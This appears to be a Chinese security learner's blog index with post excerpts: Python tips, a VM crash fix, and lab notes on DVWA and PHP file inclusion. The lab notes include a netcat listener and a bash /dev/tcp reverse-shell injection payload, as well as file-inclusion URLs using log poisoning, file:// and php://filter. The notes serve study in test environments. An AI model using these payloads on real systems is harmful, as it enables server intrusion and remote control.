随笔
LztCode
学习一开始就是模仿的过程。
网络空间安全学习者
展开
-
Mac M2芯片Arm64安卓模拟器7.0安装xposed
Mac M2芯片Arm64安卓模拟器7.0安装xposed原创 2022-09-28 03:23:17 · 5932 阅读 · 6 评论 -
获取指定路径下所有文件名的绝对路径
第一种,pathlib(推荐)import pathlibpath = "目录路径"pp = pathlib.Path(path).rglob("*")print([i for i in pp])第二种,osimport ospath = "目录路径"print([path + j for j in [i for i in os.walk(path)][0][2]])他们只是穿着校服,就已经令我羡慕不已了...原创 2022-04-03 19:01:10 · 546 阅读 · 0 评论 -
模糊哈希算法ssdeep替代模块
使用pyssdeep替代ssdeepwin的cl.exe老是出问题,有些包作者又不用win经过测试**pyssdeep.get_hash_buffer()和ssdeep.hash()**功能相同,**pyssdeep.compare()和ssdeep.compare()**功能相同,直接替代完事。gitgot改一改就可以直接在win上使用了模糊哈希算法常用与计算相似度...原创 2022-03-13 16:18:30 · 213 阅读 · 0 评论 -
python两个长度相同的列表打包,时间复杂度O(n)
python技巧原创 2022-01-10 02:32:00 · 397 阅读 · 0 评论 -
python操作数组里的字典元素
a = [{'a':'b'},{'c':'d'}] # 数组里面存放字典元素 for i in a.copy(): # 拷贝出来 a.remove(i) print(a)原创 2021-08-04 21:43:05 · 833 阅读 · 0 评论 -
线程池异步执行多参数任务
话不多说直接上代码""" 线程池模块"""def multiThread(functionName, taskList, threadNum): from multiprocessing.pool import ThreadPool pool = ThreadPool(threadNum) pm = pool.starmap_async(functionName, taskList) pool.close() pool.join() return原创 2021-06-17 15:03:26 · 173 阅读 · 0 评论 -
信息收集FAQ
信息&情报 -收集为什么要做信息收集?为什么使用ip和domain进行目录扫描?怎么样人工识别cms?目录扫描分爬行和爆破两种,伪静态网站影响目录爬行吗?为什么违法的网站会有多个类似域名?比如说.com .cn .net都是同一个网站为什么目录扫描的时候,www和不带www都要扫?如何发现并利用.git源码泄露?例如https://www.google.com/如何发现并利用.svn源码泄露?例如https://www.google.com/如何发现并利用WEB-INF/web.xml源码泄露?例如原创 2021-03-13 22:09:44 · 138 阅读 · 0 评论 -
WEBSHELL&XSS
WebShellwebshell就是以asp、 php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。隐蔽性强 功能强大 穿越防火墙 无系统日志大马功能比较齐全的Webshell,由脚本语言编写,提供了文件操作、数据库管理、执行命令等功能,一般代码量比较大原创 2020-11-24 21:58:58 · 702 阅读 · 1 评论 -
文件包含&PHP伪协议
文件包含漏洞的常见利用思路:URL传一句话进去(bp抓包),文件包含日志文件执行http://127.0.0.1/include.php?file=../Apache/logs/access.log&666=phpinfo();//要使用php里面的功能就必须传一个参数进去PHP伪协议http://127.0.0.1/include.php?file=file://c:/Windows/win.ini路径必须是绝对路径php://filter读写文件(查账号密码)http://1原创 2020-11-24 21:53:42 · 168 阅读 · 1 评论 -
信息收集&命令注入&反序列化(dvwa)
信息收集zoomeye 钟馗之眼shodan 撒旦fofa采用hash搜索标签页上面的小图片http.favicon.hash:-842852785命令注入dvwa的命令执行漏洞利用测试是否存在命令注入127.0.0.1 | winver反弹shellkali监听7777端口 nc -lvp 7777注:测试环境Ubuntu虚拟机dvwa命令注入输入 ;bash -i >& /dev/tcp/kali的ip地址/7777 0>&1反序列化(对象注入)原创 2020-11-24 21:49:53 · 688 阅读 · 0 评论 -
终止代码 PAGE_FAULT_IN_NONPAGED AREA蓝屏解决办法<VM虚拟机>
VM虚拟机打开时宿主机蓝屏暂时不明原理,但经过调试,蓝屏现象不再复现系统分页文件大小设置为0虚拟机正常使用,不为0打开虚拟机的话,宿主机蓝屏,提示终止代码 PAGE_FAULT_IN_NONPAGED AREA解决办法,经过多次测试,关闭快速启动无效。。但是经过分析后将系统<C盘>分页文件设为无,其他盘仍存在分页文件(内存不够了,贫困潦倒的菜鸟博主>︿<),蓝屏现象不再复现...原创 2020-11-08 01:28:50 · 25871 阅读 · 16 评论